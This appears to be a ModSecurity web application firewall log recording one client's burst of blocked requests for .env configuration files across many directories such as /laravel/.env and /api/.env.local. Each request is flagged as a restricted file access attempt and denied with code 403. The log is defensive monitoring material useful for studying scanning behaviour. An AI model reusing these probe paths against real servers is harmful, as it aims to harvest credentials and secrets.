[Mon May 11 22:01:48.957937 2026] [security2:error] [pid 1588898:tid 1588910] [client 193.111.117.35:21626] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/docker/compose/withMySQL/.env"] [unique_id "agI1rKFW67LJTsgN3jQEUwAAAAs"]
[Mon May 11 22:01:48.959511 2026] [security2:error] [pid 1534836:tid 1534877] [client 193.111.117.35:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rNeaRXe5lR8y0ZOs5wAAAUY"]
[Mon May 11 22:01:48.959827 2026] [security2:error] [pid 1588898:tid 1588910] [client 193.111.117.35:21626] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rKFW67LJTsgN3jQEUwAAAAs"]
[Mon May 11 22:01:48.967736 2026] [security2:error] [pid 1590352:tid 1590402] [client 193.111.117.35:21644] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/app/.env.local"] [unique_id "agI1rK1q0G_aXAqWauTyNgAAAIo"]
[Mon May 11 22:01:48.968495 2026] [security2:error] [pid 1590352:tid 1590402] [client 193.111.117.35:21644] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app/.env.local"] [unique_id "agI1rK1q0G_aXAqWauTyNgAAAIo"]
[Mon May 11 22:01:48.970139 2026] [security2:error] [pid 1590352:tid 1590402] [client 193.111.117.35:21644] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rK1q0G_aXAqWauTyNgAAAIo"]
[Mon May 11 22:01:48.978642 2026] [security2:error] [pid 1605480:tid 1605542] [client 193.111.117.35:21636] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/app/.env"] [unique_id "agI1rB2Cvzd_nyNfUm_2MQAAARQ"]
[Mon May 11 22:01:48.978873 2026] [security2:error] [pid 1605480:tid 1605542] [client 193.111.117.35:21636] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app/.env"] [unique_id "agI1rB2Cvzd_nyNfUm_2MQAAARQ"]
[Mon May 11 22:01:48.979630 2026] [security2:error] [pid 1605480:tid 1605542] [client 193.111.117.35:21636] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rB2Cvzd_nyNfUm_2MQAAARQ"]
[Mon May 11 22:01:48.986126 2026] [security2:error] [pid 1601130:tid 1601150] [client 193.111.117.35:21734] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/htdocs/.env"] [unique_id "agI1rHEgAO_835W6c1mNkwAAAEA"]
[Mon May 11 22:01:48.986391 2026] [security2:error] [pid 1601130:tid 1601150] [client 193.111.117.35:21734] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/htdocs/.env"] [unique_id "agI1rHEgAO_835W6c1mNkwAAAEA"]
[Mon May 11 22:01:48.986454 2026] [security2:error] [pid 1534836:tid 1534878] [client 193.111.117.35:21720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/laravel/.env"] [unique_id "agI1rNeaRXe5lR8y0ZOs6AAAAUc"]
[Mon May 11 22:01:48.986662 2026] [security2:error] [pid 1534836:tid 1534878] [client 193.111.117.35:21720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/laravel/.env"] [unique_id "agI1rNeaRXe5lR8y0ZOs6AAAAUc"]
[Mon May 11 22:01:48.987384 2026] [security2:error] [pid 1534836:tid 1534878] [client 193.111.117.35:21720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rNeaRXe5lR8y0ZOs6AAAAUc"]
[Mon May 11 22:01:48.987568 2026] [security2:error] [pid 1601130:tid 1601150] [client 193.111.117.35:21734] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rHEgAO_835W6c1mNkwAAAEA"]
[Mon May 11 22:01:48.992135 2026] [security2:error] [pid 1588898:tid 1588903] [client 193.111.117.35:21682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/backend/.env"] [unique_id "agI1rKFW67LJTsgN3jQEVAAAAAQ"]
[Mon May 11 22:01:48.992407 2026] [security2:error] [pid 1588898:tid 1588903] [client 193.111.117.35:21682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/backend/.env"] [unique_id "agI1rKFW67LJTsgN3jQEVAAAAAQ"]
[Mon May 11 22:01:48.993407 2026] [security2:error] [pid 1590352:tid 1590398] [client 193.111.117.35:21660] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/.env.local"] [unique_id "agI1rK1q0G_aXAqWauTyNwAAAIY"]
[Mon May 11 22:01:48.993611 2026] [security2:error] [pid 1590352:tid 1590398] [client 193.111.117.35:21660] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/.env.local"] [unique_id "agI1rK1q0G_aXAqWauTyNwAAAIY"]
[Mon May 11 22:01:48.995628 2026] [security2:error] [pid 1588898:tid 1588903] [client 193.111.117.35:21682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rKFW67LJTsgN3jQEVAAAAAQ"]
[Mon May 11 22:01:48.995986 2026] [security2:error] [pid 1590352:tid 1590398] [client 193.111.117.35:21660] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rK1q0G_aXAqWauTyNwAAAIY"]
[Mon May 11 22:01:48.999537 2026] [security2:error] [pid 1605480:tid 1605543] [client 193.111.117.35:21698] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/.env"] [unique_id "agI1rB2Cvzd_nyNfUm_2MgAAARU"]
[Mon May 11 22:01:48.999872 2026] [security2:error] [pid 1605480:tid 1605543] [client 193.111.117.35:21698] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/.env"] [unique_id "agI1rB2Cvzd_nyNfUm_2MgAAARU"]
[Mon May 11 22:01:49.000839 2026] [security2:error] [pid 1601130:tid 1601165] [client 193.111.117.35:21704] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/server/.env"] [unique_id "agI1rXEgAO_835W6c1mNlAAAAE8"]
[Mon May 11 22:01:49.001029 2026] [security2:error] [pid 1601130:tid 1601165] [client 193.111.117.35:21704] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/server/.env"] [unique_id "agI1rXEgAO_835W6c1mNlAAAAE8"]
[Mon May 11 22:01:49.001030 2026] [security2:error] [pid 1605480:tid 1605543] [client 193.111.117.35:21698] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rB2Cvzd_nyNfUm_2MgAAARU"]
[Mon May 11 22:01:49.001658 2026] [security2:error] [pid 1601130:tid 1601165] [client 193.111.117.35:21704] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rXEgAO_835W6c1mNlAAAAE8"]
[Mon May 11 22:01:49.016953 2026] [security2:error] [pid 1588898:tid 1588921] [client 193.111.117.35:21770] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/laravel/.env.example"] [unique_id "agI1raFW67LJTsgN3jQEVQAAABc"]
[Mon May 11 22:01:49.016969 2026] [security2:error] [pid 1534836:tid 1534881] [client 193.111.117.35:21776] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/backend/.env.local"] [unique_id "agI1rdeaRXe5lR8y0ZOs6QAAAUo"]
[Mon May 11 22:01:49.017300 2026] [security2:error] [pid 1588898:tid 1588921] [client 193.111.117.35:21770] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/laravel/.env.example"] [unique_id "agI1raFW67LJTsgN3jQEVQAAABc"]
[Mon May 11 22:01:49.017300 2026] [security2:error] [pid 1534836:tid 1534881] [client 193.111.117.35:21776] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/backend/.env.local"] [unique_id "agI1rdeaRXe5lR8y0ZOs6QAAAUo"]
[Mon May 11 22:01:49.017487 2026] [security2:error] [pid 1590352:tid 1590400] [client 193.111.117.35:21756] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/www/.env"] [unique_id "agI1ra1q0G_aXAqWauTyOAAAAIg"]
[Mon May 11 22:01:49.017577 2026] [security2:error] [pid 1605480:tid 1605544] [client 193.111.117.35:21752] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/html/.env"] [unique_id "agI1rR2Cvzd_nyNfUm_2MwAAARY"]
[Mon May 11 22:01:49.017688 2026] [security2:error] [pid 1590352:tid 1590400] [client 193.111.117.35:21756] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/www/.env"] [unique_id "agI1ra1q0G_aXAqWauTyOAAAAIg"]
[Mon May 11 22:01:49.017724 2026] [security2:error] [pid 1605480:tid 1605544] [client 193.111.117.35:21752] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/html/.env"] [unique_id "agI1rR2Cvzd_nyNfUm_2MwAAARY"]
[Mon May 11 22:01:49.018344 2026] [security2:error] [pid 1605480:tid 1605544] [client 193.111.117.35:21752] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rR2Cvzd_nyNfUm_2MwAAARY"]
[Mon May 11 22:01:49.018567 2026] [security2:error] [pid 1534836:tid 1534879] [client 193.111.117.35:21750] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/client/.env"] [unique_id "agI1rdeaRXe5lR8y0ZOs6gAAAUg"]
[Mon May 11 22:01:49.017631 2026] [security2:error] [pid 1601130:tid 1601170] [client 193.111.117.35:21760] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/site/.env"] [unique_id "agI1rXEgAO_835W6c1mNlQAAAFQ"]
[Mon May 11 22:01:49.019062 2026] [security2:error] [pid 1534836:tid 1534879] [client 193.111.117.35:21750] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/client/.env"] [unique_id "agI1rdeaRXe5lR8y0ZOs6gAAAUg"]
[Mon May 11 22:01:49.019214 2026] [security2:error] [pid 1601130:tid 1601170] [client 193.111.117.35:21760] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/site/.env"] [unique_id "agI1rXEgAO_835W6c1mNlQAAAFQ"]
